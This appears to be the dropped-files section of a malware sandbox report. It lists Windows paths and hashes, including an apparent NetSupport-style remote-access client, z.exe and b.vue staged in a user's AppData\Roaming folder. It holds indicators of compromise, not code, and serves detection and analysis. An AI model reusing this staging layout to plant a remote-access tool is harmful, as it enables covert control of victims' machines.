C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
b71ef1d56c36d93cd233e15b549efef4

SHA1
25f3274885746ad89bcdc6fb9e70ca724045d8c9

SHA256
833b6a9b433748afdda4493d9f1f65a96b8603782cb7762177669f8f69ab8bed

SHA512
8c29f3c26956caff95f1a61b578ee776dffa7f235c126cfbf50a91a23746034d5487dc609ad95a57efc1b4069752b0ad94832587cd9ab1ad9e68873328a43c78

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
dfe961a77a68e2028dc3b62e490cab47

SHA1
76810efca2c224578faf4335a37e69987e00d4ca

SHA256
40680ce281bfc908f4a33849ae521c76563d01d5240cd47bcd18bbb3e02e49ca

SHA512
c3b0b100d4730a063b2dda44611d792f3f66cfe71b8dbf4f82b406a43b46ceb3e3e7ad92e3cf1b015088f6b55256cc5885109c290b5507787c12ffdd857b0f62

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
95518d9686bd13465dda65b988305e75

SHA1
52af77ab1791846d706971ff003747d8fc9fa118

SHA256
967e407e61d17f22c72f1f6f0ee04e977dc8b04f1bd6f499711cea41db82902d

SHA512
9e0efffc3f0270c94d1dd5cb3ddb615238dcb5f3a33c35febbe183fdadc397d3485571ab3c45f618ac086b51b66f8f3170b6428f80c9e097e2bf615ac750e623

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
26c5eb0d1bf6671686b9acdc43aed74f

SHA1
ac9f2abd47807d1c67c1e438fe087c750f2dbc4e

SHA256
541eead6d227edff9a8dd75550deb071b90699cafe12b2acf456ea18992c8d34

SHA512
0abc41b86a8538f1d42e246e652985002577b737d4ec45bfb40ac37f40223ca3a6685f499c671325b39bca9a3fe9e97fe2552c4019b3a6075833e3227a33e77a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
1fc875e909180eef379c9905bb743db6

SHA1
4174e7411a1c966545b4a320afa940b6fda90d53

SHA256
3a9255e4332767ddf76fe1a423f94f9fefe569c3020e15d10e5848a19577a7e7

SHA512
fbc615cdbfc1b3d423fe6b7260a7548f92f3e3ce68fbd840be8392dfb3bebba13f2de2b107c0950bb9ebb098143175695657e358b2e27e236ec187fdb40f0ba4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
c57729741dbc7c3e24e68cad3d348095

SHA1
e4ab891d09bfbc50078649c2e176627670f9afb2

SHA256
34d2ebb4a63f58afa2bc368faef1faf9d5677bebe3ab22318fbe382e19068464

SHA512
f4ce430159f4e61e1d5233257c84f859fd405c3391dc9154d173e13f5870f1e4d8346c65795cd3c976ff3056c36c1079c14773dc342e9322b2eb00173cd7e47a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
a8d946bde6460e6ab63a2563128be446

SHA1
35e9812f51e9f26c091d89dd31b3affe73e7dee4

SHA256
c59dc45c7bf70bcebdf94d3448253b4a5adb0e9f86c720f33e8fe7469343b680

SHA512
7ced8bb61c90259d7c0495a16bcbd7558823fcfe8be5b44b60eeb3000fe7401422d2dc3aa97a7f034e27a9ebb89e5352513e2c92f2f8219cf59798d0af40ddbd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
7508da122f511dc6e964c7d021865e27

SHA1
958f6c3312c76af2c10c92bff208416ec99eda4e

SHA256
152adabd4071f7cd95094092d3547e491694e1ac2a5f096c50836fe35a168fb4

SHA512
340526e70e7c370eded926920c0ae9b905ee7642fc736c7e7f0c64c94db3b9323b917c9d43523b07239993679bbbbd5238ba2ac91576caa621826d9f67d14464

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
41a077f543c4ebbe4cf828be3d0573bc

SHA1
b2131b41beee541f73dc7d9dffd05fcb497118cd

SHA256
c0093f46843535eef929666572261da1511f851d8615cd4d6f78cf1610351cbe

SHA512
56003fff5a4b4552f5e3fc4297be744db4b9ea3dab79187e3e498726a9ad89e0158aea6171c77745dc70bdd71f0d65dbd0ba5f22e8ac1f1584a192530eb312ca

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
a8bb516611de946a0ce50c67311885e4

SHA1
aa0bef2037ea36828d7fb3f964269020378cebb5

SHA256
330617309b7239621a2a403f60843a05c83b9fc26ed4acedd0a6029b05739fff

SHA512
519393fa07428d6c63a841bc1972a0bb2383258800249db91a5f3511adb5491f439e62a080c55879b35bd7f03066b6b623cf5b8e7569778d2f1f5fb46c5e7358

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
318ae580897410846948721b8113f1c4

SHA1
392a957180c78aca4561c29e988049a1fb6f29ce

SHA256
dd7ec05989ac0495b74fcc7a19e1661edb1427afab0f1fbb6ca73f06eb94f2c9

SHA512
419de4b78d263df0b5728c1b9ff89362cd8fd50a82eba0d767b7a28c4e0621bebf8ebf85850253c097ec5570738a3c185d1d413db351cc4e318f16ff822b8fce

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\492d22f2-5360-463c-b6c8-81b2e4f8c334\index

Filesize
24B

MD5
54cb446f628b2ea4a5bce5769910512e

SHA1
c27ca848427fe87f5cf4d0e0e3cd57151b0d820d

SHA256
fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d

SHA512
8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\492d22f2-5360-463c-b6c8-81b2e4f8c334\index-dir\the-real-index

Filesize
624B

MD5
23e538fb04d7a7d830b76721bd9fb740

SHA1
9ab124346142421f4decca4d979a648176615b6c

SHA256
f1506377e8b7fb4e0421017c3f5874e3d21759ad391292ab9af4dde8f03f590c

SHA512
304651bca8e4afc1c1de2804975b243e9ca28f3bc2af5a919f8bf5c9a50d3ad953f39318635e0065c2be6e0eb33e13125e62c754a74ff1bace1c167323860456

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\492d22f2-5360-463c-b6c8-81b2e4f8c334\index-dir\the-real-index~RFe584aa0.TMP

Filesize
48B

MD5
ddef20b000ec1ced6d92954fe7f19751

SHA1
2e17087a2adb44645be4e5e1c01886076d28012b

SHA256
1d1c257696ebd825e290162db9599473a00295e4a8e76d5a85e64edf7aeed8d8

SHA512
88bb62cd1e912cf73a49bed1b89a68eeda69ea805683cc700c064cd35e13cce2baf2adbf2c1e70882673d0527fa033849760c7a84eb3961864312ef88a7c4a6c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\6d214424-cd14-47e9-9d3d-92f63eec025c\index-dir\the-real-index

Filesize
2KB

MD5
3ad0e923be3581f9e2de90bbe0377dcb

SHA1
6f6c1c4c99bb0e73699c53f756924f81fe50e09a

SHA256
bd518abfedf70901ffee01cf07ce9dbff0ab7e47736b9209095df9dd3191510a

SHA512
99376919084f50f389647c5f8980b8eec05a979e9a79c80d047e595f45df6e13a031b932b59261131ddcc8668b916f467af29b2b7c89218ae3c9d746693020e1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\6d214424-cd14-47e9-9d3d-92f63eec025c\index-dir\the-real-index

Filesize
2KB

MD5
16c758cc9451957cbe9c81cbc547cf5c

SHA1
f297a5af4369cbb637adae7fb0418c2357555581

SHA256
0aac01f13be947b5a7034427e7f873f74975a8e5fd57c37af9ce177751b0de0d

SHA512
1b3fadd28620083278e3e377e4084785b9b762657431d8a4e803287ce6463d97d12a0f090b04351b3dc1b9568391deaf27b387f680a0e9de87969fbb1f0004ea

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\6d214424-cd14-47e9-9d3d-92f63eec025c\index-dir\the-real-index

Filesize
2KB

MD5
1e1a7b3d6ceeec4eed817b8c83bf0a11

SHA1
f8d87f0a05415f80107997af5bff2db86db8e23e

SHA256
d35613c1bd93a93d01f5f6eb90df8c88fdb9eb29805b8e071b782eecdde970c5

SHA512
2439d116050efedad64cf34534608831168f7b47ee63d860338ffb597722733efbb1a44e30369b0828e587ef3dcbb6f913b14c9c805b060b08db9058f97bcb68

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\6d214424-cd14-47e9-9d3d-92f63eec025c\index-dir\the-real-index~RFe57dafe.TMP

Filesize
48B

MD5
bf57826eb2cc9568b3a94f41cc1e003d

SHA1
6173d57d49817169456269a099e42db014d486e0

SHA256
c01bc5a96f62da932f366322646f7ce57e930e8dd35fc4cf1c572588d0c4162b

SHA512
79dce5b4248a494bfeaf029341c4aedf924b9743b8c75266249cdd35819e45b5b5fc9cb416582600b8a2565da5c9f2f7b130fe3c10e17ee3b3f166134d2a6241

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
183B

MD5
39bd2b61abf3b54ccf8f4d7091481f6d

SHA1
b6061499b8a02ae5ed88af3da87f8d56464e6e39

SHA256
04d0846057689ee26a7d1426b597b7e51fec4506c4a66c0987b37912c367ca7e

SHA512
029cbc4976d2e2f1bfefd6852ec08c66ced27589775f5fab21dfa84cbbed4641a4c206850488dfccc770013f0c43886b5491f6b1f244150e7cf7405b150cdcef

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
178B

MD5
247c5c5d8e855f179aa25a9e6a654d86

SHA1
cb707edc139ab178234ee68384ca37fbb212b31d

SHA256
766f073222489bc240d6a4952120a11f251033ac5257f2a4ade87c732c97df16

SHA512
90289970581ceabdefe20ee2b4a265285f798c94fd11115743c6401ffde541e002c35f865219bbd5dea418ca752c1111aecf8547b3b004a062a760bb8a3e8a8d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
187B

MD5
fe465cf07b9a015774fbf72dd8bfd445

SHA1
ca8070e820ae86307fc9a7dc39f82b76f97a213a

SHA256
a3072de1eafe7645b943e3cca9097424a44539abeafd85f915f0243a627c975f

SHA512
20b11c7446c8df22437a6cbc0534420dc0f0a21fdf22e9cb73f9a6d909b8359cecdb19e7a95fa0ec6a30dc143c5417cf06a46cc43460c37a706b0722cb56aae2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
183B

MD5
bb3fcd512ff5933c22e81f2c9a57998f

SHA1
35942107fd6a0e7818f084feab44a16e8e870459

SHA256
9dc6aa8386e58352f877b40a88eb4944250846cf25bc79582150353d0b91710f

SHA512
74abeed1d4011c210174182e5e3df06c8232e44da4d59dd4a5c467aac332a08e1d3095b5403dfb9bf3ab5e392f7af5f1fd55c784e1365cbdce44538d43335574

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
176B

MD5
b38d0d85fbb0986dd8ea8b99e08bcc9a

SHA1
944da9babe75558c462a9084c66d38625f37b4a8

SHA256
9e3bebbbfe52e5bdeca52b3b255d991c356c55baa3a82b25a6a73a1b25c3b564

SHA512
b4becd73cdf9610867a7fee253b0878d3ff4bb6ef73afc9e656a7888d01c3cb03d4a6e2a7fe3ecbfaa348e9955573255715f78acbd95a0938c123580ccf7be5b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
112B

MD5
679df38e3f0e5b0e3a3e71f0a30aa1c8

SHA1
5100fc53a418725eb6b9b22e76d03a8d7b9c037b

SHA256
b1f27366f3e6528832aa1c07e25c1d19b7b7cc66814372aca257fd9d3a09cda7

SHA512
1ff98f941528a2fe8c62acf43ba9e69426bbc74bfdfaf4abbe9532236aa46a9f5b1b90a1ac6b626c786a2816b63aebb35b6e8630f323f216c9387790f0e23058

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
114B

MD5
15c3b85ec98d77b33e82d4f91b5a2c6e

SHA1
a5b822f8b4b58c4176a3ce31e34699adf69b88d1

SHA256
a1581899664e7f943621afd44163d40084a44f2a538d81f792c9ce89c5eb8340

SHA512
4e0c68094c733eacf536b998a08dd70b79045076cb08a71c48d8fd8c67cba9c6a88719f9ffc67a508025285bf071aa227edb3c3965979ef66babe17a2a3332e3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt~RFe57b258.TMP

Filesize
119B

MD5
5223e8ce4e8b0aa91485730d4baf7f9c

SHA1
5f97b83806edbbd6c72aa6b30a7719842089f283

SHA256
e4300c6574bdcb39feafac2b7aa76b48d7c71d299652693172a92a030ffda821

SHA512
6c802a5db67043c2a7ec237ef448698d7d0a797785a094acbd9591509523e546877ac576030f9ecdfb6d045e57a2da48793924e20972fc5f6ab2b97e52566bbc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
120B

MD5
e443c544984a503bb2f731c29abfe867

SHA1
19ffd89929a9a8dcb8ba1a046fd0558cb6ab0037

SHA256
784596e81390a07e297241d5b98fb3f05bf1adf100323fee1cf15903a92e0000

SHA512
29087b2be7180f5867d3610e8f9099fb4ff213c9dbaa0b70339dfbd8662f9ff9134c8574e0d6938a7270141d37e388434ed1d62c513d5fa1f1a235a8cbe3256e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\32.png

Filesize
1001B

MD5
9b4d2aa85bae2b94477371dba6544b2a

SHA1
4dd2d97aa25b2723a91016ee5b403619e7a4eb99

SHA256
3af45701fd97bc8ae6ae8e9f999d5d8b9d61a9a7914faf6518450f454e884223

SHA512
f6351c370d91a87a2b0abd8da8460e65a8149700beff2e819074004101133e750b1e60ecdf6ead73d1de19f37258e7853084d65c6adfeab8707c480d9caabc93

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Shortcuts Menu Icons\0\512.png

Filesize
2KB

MD5
206fd9669027c437a36fbf7d73657db7

SHA1
8dee68de4deac72e86bbb28b8e5a915df3b5f3a5

SHA256
0d17a989f42bc129aca8e755871a7025acb6292ce06ca2437e95bedbc328fa18

SHA512
2c89878ec8466edf1f214d918aefc6a9b3de46d06ffacff4fdb85566560e94068601b1e4377d9d2eabefdc1c7f09eb46b00cf4545e377cc84a69edf8e57e48b2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\scoped_dir3876_1060202542\Shortcuts Menu Icons\Monochrome\1\512.png

Filesize
10KB

MD5
529a0ad2f85dff6370e98e206ecb6ef9

SHA1
7a4ff97f02962afeca94f1815168f41ba54b0691

SHA256
31db550eb9c0d9afd316dc85cdfd832510e2c48e7d37d4a610c175667a4599c6

SHA512
d00e2d741a0a6321c92a4aab632f8f3bafd33c0e2875f37868e195ed5e7200a647b4c83358edcef5fc7acbc5c57f70410903f39eac76e23e88a342ac5c9c21cd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\scoped_dir3876_1644472398\Icons Monochrome\16.png

Filesize
214B

MD5
1b3a4d1adc56ac66cd8b46c98f33e41b

SHA1
de87dc114f12e1865922f89ebc127966b0b9a1b7

SHA256
0fb35eacb91ab06f09431370f330ba290725119417f166facaf5f134499978bd

SHA512
ce89a67b088bae8dcd763f9a9b3655ed90485b24646d93de44533744dfcf947c96571e252d1ad80bdec1530ff2b72b012e8fff7178f1b4e957090f0f4c959e0d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
116KB

MD5
fcebcba7aa594c58fadc8724934d7183

SHA1
348afbaa06fb918f59e09cc5a7a9e069d13a9a23

SHA256
e0bdddd6731665eeca117960eba0dcee68005aff18bf6b727577cdfa4ff596ee

SHA512
4cdab38d6c11587f1ae8f611367a98fc91965fa9c61bb2fe222a356dbf8fba3c7a906d43da10910bfeaca0a1a63a624852403eaa0979208a41361f6eeef417e2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
116KB

MD5
126362cfc5991df8b57f661b2fa608a0

SHA1
974639ed5c32f1f9ad13a1599def15166f422551

SHA256
0cff65984814dbfbda510d368a1afc8d42d015178e0f4dea3d565e76a12a539b

SHA512
1dfd584771d804b574c4788df7c0f7497ba28b69063611b5a9809699d8d007dae9384b6f19bce84eb5cf1121832c784b4cdd6c28cfe41d794287a2799225bf0f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
a26df49623eff12a70a93f649776dab7

SHA1
efb53bd0df3ac34bd119adf8788127ad57e53803

SHA256
4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

SHA512
e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
635a747274fdec630ac85e230fba5027

SHA1
c503c4eb24282dbb501ff34fc0b6dde650ecddf7

SHA256
1c823086a371263f7064538244bec83f092c754dddf16a401a53c81c358736db

SHA512
ca77b0428985d466800c570098772f3abce5cf43d44764c4fd1e3fffbd1af104086a2faee5e6756043a682729a75e591bcd293c89ad2b34cc926a691997cf9a8

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zgwy2rm3.kit.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\7z.dll

Filesize
1.1MB

MD5
95c6515d88e9ea48a9b949a81c1dac4e

SHA1
c93eeb4241f69fea44c4d8ccdde03f3b40a6be3f

SHA256
b17c3e4058aacdcc36b18858d128d6b3058e0ea607a4dc59eb95b18b7c6acc7c

SHA512
d4474418a9290d89bff9ca58249e501e0d8f42a9153874c0dbb36f35eaabbb18a3e700fb6f2feb2eec7ceed3254ff1aec08752d09efad9d2c25aa6284471d1c6

Download Submit
C:\Users\Admin\AppData\Roaming\Ns\HTCTL32.DLL

Filesize
316KB

MD5
051cdb6ac8e168d178e35489b6da4c74

SHA1
38c171457d160f8a6f26baa668f5c302f6c29cd1

SHA256
6562585009f15155eea9a489e474cebc4dd2a01a26d846fdd1b93fdc24b0c269

SHA512
602ab9999f7164a2d1704f712d8a622d69148eefe9a380c30bc8b310eadedf846ce6ae7940317437d5da59404d141dc2d1e0c3f954ca4ac7ae3497e56fcb4e36

Download Submit
C:\Users\Admin\AppData\Roaming\Ns\NSM.LIC

Filesize
261B

MD5
886e4bb84e1ecc4a04ae599d76fcce1d

SHA1
3f0493bb2088af50bcc8223462db0b207354e946

SHA256
5eeb014e3b390e0c85ce72988d422dcd9de1520566b11755c70bdd9bb7376060

SHA512
f4db9038a113c4b1e2462b3e0becef2500c9532a79c8187f51d011d690bc68c6d1a99585e43136cb082bd6a232136546db50265f226ff19e67d8430306a8761f

Download Submit
C:\Users\Admin\AppData\Roaming\Ns\PCICAPI.dll

Filesize
106KB

MD5
67c53a770390e8c038060a1921c20da9

SHA1
49e63af91169c8ce7ef7de3d6a6fb9f8f739fa3a

SHA256
2dfdc169dfc27462adc98dde39306de8d0526dcf4577a1a486c2eef447300689

SHA512
201e07dbccd83480d6c4d8562e6d0a9e4c52ed12895f0b91d875c2bbcc50b3b1802e11e5e829c948be302bf98ebde7fb2a99476065d1709b3bdbcd5d59a1612d

Download Submit
C:\Users\Admin\AppData\Roaming\Ns\PCICHEK.DLL

Filesize
14KB

MD5
3aabcd7c81425b3b9327a2bf643251c6

SHA1
ea841199baa7307280fc9e4688ac75e5624f2181

SHA256
0cff893b1e7716d09fb74b7a0313b78a09f3f48c586d31fc5f830bd72ce8331f

SHA512
97605b07be34948541462000345f1e8f9a9134d139448d4f331cefeeca6dad51c025fcab09d182b86e5a4a8e2f9412b3745ec86b514b0523497c821cb6b8c592

Download Submit
C:\Users\Admin\AppData\Roaming\Ns\PCICL32.dll

Filesize
3.3MB

MD5
e7b92529ea10176fe35ba73fa4edef74

SHA1
fc5b325d433cde797f6ad0d8b1305d6fb16d4e34

SHA256
b6d4ad0231941e0637485ac5833e0fdc75db35289b54e70f3858b70d36d04c80

SHA512
fb3a70e87772c1fb386ad8def6c7bdf325b8d525355d4386102649eb2d61f09ce101fce37ccc1f44d5878e604e2e426d96618e836367ab460cae01f627833517

Download Submit
C:\Users\Admin\AppData\Roaming\Ns\client32.exe

Filesize
101KB

MD5
c4f1b50e3111d29774f7525039ff7086

SHA1
57539c95cba0986ec8df0fcdea433e7c71b724c6

SHA256
18df68d1581c11130c139fa52abb74dfd098a9af698a250645d6a4a65efcbf2d

SHA512
005db65cedaaccc85525fb3cdab090054bb0bb9cc8c37f8210ec060f490c64945a682b5dd5d00a68ac2b8c58894b6e7d938acaa1130c1cc5667e206d38b942c5

Download Submit
C:\Users\Admin\AppData\Roaming\Ns\client32.ini

Filesize
763B

MD5
e35ec50a9e5a7ce541051dd2ea07880c

SHA1
8d44e8d0ae6b48517b72c76b056e4f3e2a64fa52

SHA256
576fb12062a6b874a62cf4a9cda991ae2179a7b06a8b51f0db5a6d84d5d63dc0

SHA512
7984144307db138e19d90a4ab7d20661ce1a87f37e9f295d8be6bb853c110235fb126f231d583dafe16fb1e33362b6fd4d4ee394379e025885d95daa28b19c90

Download Submit
C:\Users\Admin\AppData\Roaming\Ns\msvcr100.dll

Filesize
755KB

MD5
0e37fbfa79d349d672456923ec5fbbe3

SHA1
4e880fc7625ccf8d9ca799d5b94ce2b1e7597335

SHA256
8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18

SHA512
2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

Download Submit
C:\Users\Admin\AppData\Roaming\b.vue

Filesize
1.4MB

MD5
35044bee252f57b87f7aba2b61c2f9ab

SHA1
8063703624db0d09e5bfff4b1284e197f81c52c1

SHA256
21f5e1dc20cf632c9fd2f6702fb2d24198a7591ee9e0b3ed18ebf371cc060728

SHA512
2ab50783ae4ccfdb463c8d1158d9ee053b358e8f1ec753565ac1272b46fd60760219db7d311f89531b5ca0c1a812e17d575435cd1adea661acac2f7dfcf4039b

Download Submit
C:\Users\Admin\AppData\Roaming\z.exe

Filesize
296KB

MD5
58712aacf6b0f8149c066bda3a034fc3

SHA1
cf2da87d52a6b08a3b9502b1f6082b8b76ba4d32

SHA256
43907e54cf3d1258f695d1112759b5457576481072cc76a679b8477cfeb3db87

SHA512
f9df1dfdc3f706a5adfe2f38e91d8a3cb23dd46cd35b26c95bfe6ede7a731a536c4fa72304b86e699db56c669819fa4e132ab37da9561240ee29743edf5bcc7f

Download Submit
\??\pipe\crashpad_3876_HCBTQDSXCSFMFEZR

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/5160-1001-0x0000016BA5860000-0x0000016BA5A22000-memory.dmp

Filesize
1.8MB

Download
memory/5720-878-0x0000023F97550000-0x0000023F98011000-memory.dmp

Filesize
10.8MB

Download
memory/5720-868-0x0000023F97550000-0x0000023F98011000-memory.dmp

Filesize
10.8MB

Download
memory/5720-899-0x0000023F97550000-0x0000023F98011000-memory.dmp

Filesize
10.8MB

Download
memory/5720-782-0x0000023FB09E0000-0x0000023FB0A56000-memory.dmp

Filesize
472KB

Download
memory/5720-845-0x0000023F97550000-0x0000023F98011000-memory.dmp

Filesize
10.8MB

Download
memory/5720-833-0x0000023F97550000-0x0000023F98011000-memory.dmp

Filesize
10.8MB

Download
memory/5720-888-0x0000023F97550000-0x0000023F98011000-memory.dmp

Filesize
10.8MB

Download
memory/5720-776-0x0000023FB0420000-0x0000023FB0442000-memory.dmp

Filesize
136KB

Download
memory/5720-1054-0x0000023F97550000-0x0000023F98011000-memory.dmp

Filesize
10.8MB

Download
memory/5720-781-0x0000023FB0910000-0x0000023FB0954000-memory.dmp

Filesize
272KB

Download